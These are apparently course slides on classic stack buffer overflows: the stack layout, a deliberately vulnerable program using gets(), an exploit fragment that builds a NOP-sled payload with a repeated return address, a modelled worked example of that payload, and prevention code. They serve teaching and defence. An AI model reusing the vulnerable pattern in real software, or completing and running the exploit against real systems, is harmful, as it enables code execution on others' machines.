BUFFER OVERFLOW -Eswar Balasubramanian ECE578
Precursor: how serious is this BO?
• Number of vulnerabilities in the past week – 11
• First six vulnerabilities of 2002

Agenda
• BO – what is it?
• About the stack
• Exploit
• Prevention
Buffer Overflow
• Copying more data into a buffer than it can hold. strcpy() has no idea how big the destination is; it copies until it finds the terminating NUL in the source:

    char variable[10];
    char safe[]   = "AAAAAAAA";                        /* 8 chars + NUL = 9 bytes, fits in variable[10]  */
    char unsafe[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA";   /* 29 chars + NUL = 30 bytes, 20 bytes too many */
    strcpy(variable, safe);     /* fine                                                     */
    strcpy(variable, unsafe);   /* overflow: 20 bytes land past the end of variable         */
Stack
• Used by functions
• Local variables are allocated dynamically on it
• esp (stack pointer) and ebp (frame pointer) are adjusted accordingly

    /* vulnerable.c */
    #include <stdio.h>
    int main()
    {
        char buffer[500];
        gets(buffer);      /* no bound at all: reads until newline */
        return 0;
    }

Frame of main() while gets() is running (addresses grow to the right):

    esp                                    ebp
     |                                      |
     v                                      v
    [ buffer[500] ][ sfp [4] ][ ret [4] ]

• sfp is the saved frame pointer (the caller's ebp), ret is the address main() will return to.
• gets() itself returns normally to the instruction after the call (the "return 0"); the overwritten ret is only consumed when main() executes that return.
What Next?
• Alter the return address to our liking
• Place tailor-made code where that return address points

    [ buffer     ][sfp ][ret ]
    [xxxxxxxxxxx][xxxx][xxxx]
         500        4     4

Algorithm:
1. Copy a big string into the buffer so that it runs over sfp and ret.
2. Overwrite ret with an address that points back into the beginning of the buffer.
3. When main() returns, execution continues at the place ret points to, which is now inside the buffer.
4. That buffer contains the code we want to run.
To Do
• Calculate the return address
• Construct the large string

Return address:
• Estimated from the stack pointer: the exploit reads its own esp (the target's stack lives at nearly the same place) and subtracts a guessed offset.
• A NOP sled makes the guess forgiving: landing anywhere in the sled slides execution into the code.

String layout:
• Initially fill the whole string with the return address, repeated every 4 bytes, so that whichever word lands on ret is a complete, aligned copy.
• Start of the string becomes NOPs (about a third; the code below uses the first half).
• Put the tailor-made code after the sled.
• Deliver it so that it overflows the buffer (usually by passing it as an argument or on stdin).
• The address must not contain a 0x00 byte, or strcpy() stops early.
    /* exploit fragment, 32-bit x86 (long == 4 bytes)                                 */
    /* esp, offset and listDir (the shellcode) are set elsewhere in the exploit     */
    /* and are not shown on the slides. SIZE must exceed 500 + 4 + 4 and be a       */
    /* multiple of 4 so that the copy of ret that lands on the saved ret is aligned. */
    #include <string.h>
    #define SIZE 600                              /* 600 is an assumed value, not from the slide */

    char  buffer[SIZE + 1];
    char *ptr;
    long *addr_ptr, ret;
    int   i;

    ret = esp - offset;

    /* 1. fill the whole buffer with the return address, one copy per 4 bytes */
    ptr = buffer;
    addr_ptr = (long *)ptr;
    for (i = 0; i < SIZE; i += 4)
        *(addr_ptr++) = ret;

    /* 2. turn the first half into a NOP sled */
    for (i = 0; i < SIZE / 2; i++)
        buffer[i] = '\x90';

    /* 3. place the shellcode in the middle, right after the sled */
    ptr = buffer + ((SIZE / 2) - (strlen(listDir) / 2));
    for (i = 0; i < strlen(listDir); i++)
        *(ptr++) = listDir[i];

    buffer[SIZE] = '\0';                          /* terminate so it can be passed as an argument */
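The layout the "What Next?" and "To Do" slides describe, worked through end to end as an added example (this is not code from the deck). Instead of smashing a real stack, it models the frame from the "Stack" slide as a struct, builds the string with the same three steps (ret everywhere, NOP sled in the first half, shellcode in the middle), copies it over the modelled frame, and then checks what a practitioner actually cares about: that a complete, aligned copy of ret landed on the saved return address, that the guessed address falls inside the sled, and that the string carries no NUL byte that would stop strcpy() early. The buffer address, the guessed offset and the int3 bytes standing in for the deck's "listDir" shellcode are all assumptions made up for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   500                 /* char buffer[500] in vulnerable.c          */
#define FRAME_SIZE (BUF_SIZE + 4 + 4)  /* buffer + saved ebp (sfp) + return address */

/* Model of the frame from the "Stack" slide: 32-bit slots, no padding
 * (500 is a multiple of 4, so sfp sits at offset 500 and ret at 504). */
struct frame {
    char     buffer[BUF_SIZE];
    uint32_t sfp;
    uint32_t ret;
};
_Static_assert(sizeof(struct frame) == FRAME_SIZE, "frame model must be 508 bytes");

/* Constructed stand-in for the deck's "listDir" shellcode (int3 breakpoints);
 * the real bytes are not on the page. Real shellcode must contain no 0x00. */
static const unsigned char shellcode[8] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc };

/* Lay the string out as the "To Do" slides describe:
 *   1. every 4-byte slot = ret, 2. first half = NOPs, 3. shellcode centred,
 * then NUL-terminate so it can travel through strcpy()/argv.
 * Returns bytes written (excluding the NUL), or 0 on bad arguments. */
static size_t build_payload(unsigned char *out, size_t size, uint32_t ret,
                            const unsigned char *sc, size_t sc_len)
{
    size_t i;
    if (size % 4 != 0 || sc_len > size / 2)
        return 0;
    for (i = 0; i < size; i += 4)
        memcpy(out + i, &ret, 4);            /* host byte order, like the deck's exploit */
    for (i = 0; i < size / 2; i++)
        out[i] = 0x90;                       /* NOP sled */
    memcpy(out + (size / 2 - sc_len / 2), sc, sc_len);
    out[size] = '\0';                        /* caller provides size + 1 bytes */
    return size;
}

/* strcpy()/gets() stop at the first 0x00, so the payload must be NUL-free. */
static int has_embedded_nul(const unsigned char *p, size_t n)
{
    return memchr(p, 0, n) != NULL;
}

/* Does the guessed return address point into the sled [base, base + sled_len)? */
static int lands_in_sled(uint32_t ret, uint32_t buffer_base, uint32_t sled_len)
{
    return ret >= buffer_base && ret - buffer_base < sled_len;
}

/* Stand-in for the unchecked copy in vulnerable.c: memcpy over the whole
 * struct, so the run is deterministic (no real stack smashing happens). */
static void overflow_frame(struct frame *f, const unsigned char *payload, size_t n)
{
    memcpy(f, payload, n);
}

/* Worked run with an assumed buffer address; returns 1 if every check holds. */
static int demo(void)
{
    unsigned char payload[FRAME_SIZE + 1];
    struct frame f;
    uint32_t base = 0xbffff4a0u;   /* assumed address of buffer[0] (esp - offset)   */
    uint32_t ret  = base + 100;    /* guessed target: anywhere in the sled will do   */
    size_t sled_len = FRAME_SIZE / 2 - sizeof shellcode / 2;  /* bytes before shellcode */
    size_t n = build_payload(payload, FRAME_SIZE, ret, shellcode, sizeof shellcode);

    memset(&f, 0, sizeof f);
    overflow_frame(&f, payload, n);

    return n == FRAME_SIZE
        && !has_embedded_nul(payload, n)
        && f.sfp == ret                      /* sfp slot overwritten too, as on the slide      */
        && f.ret == ret                      /* saved return address now points at our string  */
        && lands_in_sled(f.ret, base, (uint32_t)sled_len)
        && memcmp(f.buffer + sled_len, shellcode, sizeof shellcode) == 0;
}

int main(void)
{
    printf("payload/frame model: %s\n", demo() ? "OK" : "FAILED");
    return demo() ? 0 : 1;
}
```

The two conditions that silently break the real exploit are the ones the checks cover: if the string did not start its ret copies at a 4-byte boundary relative to the saved ret slot, only a partial address would land there; and if either the address or the shellcode contained 0x00, strcpy() would stop before reaching ret at all. Addresses such as 0xbffff4a0 are only a plausible value for the 32-bit Linux stacks of the deck's era; on a system with address space randomisation the guess changes on every run.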
PREVENTION
• Use bounded calls: strncat(), strncpy(), fgets() instead of strcat(), strcpy(), gets(). Watch the semantics: strncpy() does not add a terminator when the source is longer than the limit, and the n in strncat() is the number of bytes to append, not the size of the destination.
• StackGuard: the compiler places a canary between the locals and the saved frame pointer/return address and aborts on return if it has been changed.
• Kernel patch to make the stack non-executable, so code placed in the buffer cannot be run.
• Wrapper libraries that bounds-check the dangerous libc calls at run time.
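The first prevention bullet in working form, as an added example that is not part of the deck: a replacement for the gets() call in vulnerable.c built on fgets(), a copy helper that always terminates and reports truncation, and a small check that shows the strncpy() pitfall the bullet warns about. The 500-byte buffer is the one from vulnerable.c; the over-long input line is constructed inside the example and fed through a temporary file so it runs offline.

```c
#include <stdio.h>
#include <string.h>

/* Replacement for gets(): reads one line into dst (at most dstsz-1 chars),
 * strips the newline, and discards the rest of an over-long line so the
 * excess is not handed to the next read. Returns chars stored, -1 on EOF. */
static int read_line(char *dst, size_t dstsz, FILE *in)
{
    size_t len;
    if (dstsz == 0 || fgets(dst, (int)dstsz, in) == NULL)
        return -1;
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;                                   /* drain the rest of the line */
    }
    return (int)len;
}

/* strncpy() copies at most n bytes and adds no terminator when src is longer
 * than n. bounded_copy always terminates and tells the caller about it:
 * returns 0 when the whole string fitted, 1 when it was truncated. */
static int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return 1;
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* The pitfall itself: after strncpy() of a longer string into an 8-byte
 * buffer, no byte of dst is '\0'. Returns 1 if dst was left unterminated. */
static int strncpy_leaves_unterminated(void)
{
    char dst[8];
    memset(dst, 'X', sizeof dst);
    strncpy(dst, "AAAAAAAAAAAAAAAAAAAA", sizeof dst);   /* 20 A's into 8 bytes */
    return memchr(dst, '\0', sizeof dst) == NULL;
}

/* Feeds a constructed 998-char line, then "next", through read_line() into
 * the 500-byte buffer from vulnerable.c. Returns the chars stored for the
 * first line (499), or -2 if the second read did not see "next" cleanly. */
static int demo_read_line(void)
{
    char buffer[500];
    char input[1000];
    FILE *in = tmpfile();
    int stored;
    if (in == NULL)
        return -1;
    memset(input, 'A', sizeof input - 2);
    input[sizeof input - 2] = '\n';
    input[sizeof input - 1] = '\0';
    fputs(input, in);
    fputs("next\n", in);
    rewind(in);
    stored = read_line(buffer, sizeof buffer, in);
    if (read_line(buffer, sizeof buffer, in) != 4 || strcmp(buffer, "next") != 0)
        stored = -2;
    fclose(in);
    return stored;
}

/* Returns 1 if bounded_copy both truncates with a terminator and copies
 * a fitting string unchanged. */
static int bounded_copy_demo(void)
{
    char dst[8];
    if (bounded_copy(dst, sizeof dst, "AAAAAAAAAA") != 1 || strlen(dst) != 7)
        return 0;
    if (bounded_copy(dst, sizeof dst, "short") != 0 || strcmp(dst, "short") != 0)
        return 0;
    return 1;
}

int main(void)
{
    printf("strncpy left buffer unterminated: %d\n", strncpy_leaves_unterminated());
    printf("read_line stored %d chars of a 998-char line\n", demo_read_line());
    printf("bounded_copy checks: %s\n", bounded_copy_demo() ? "OK" : "FAILED");
    return 0;
}
```

Draining the remainder of an over-long line matters as much as the bound itself: without it the next fgets() call quietly returns the leftover bytes, and input that was meant as one line is processed as two.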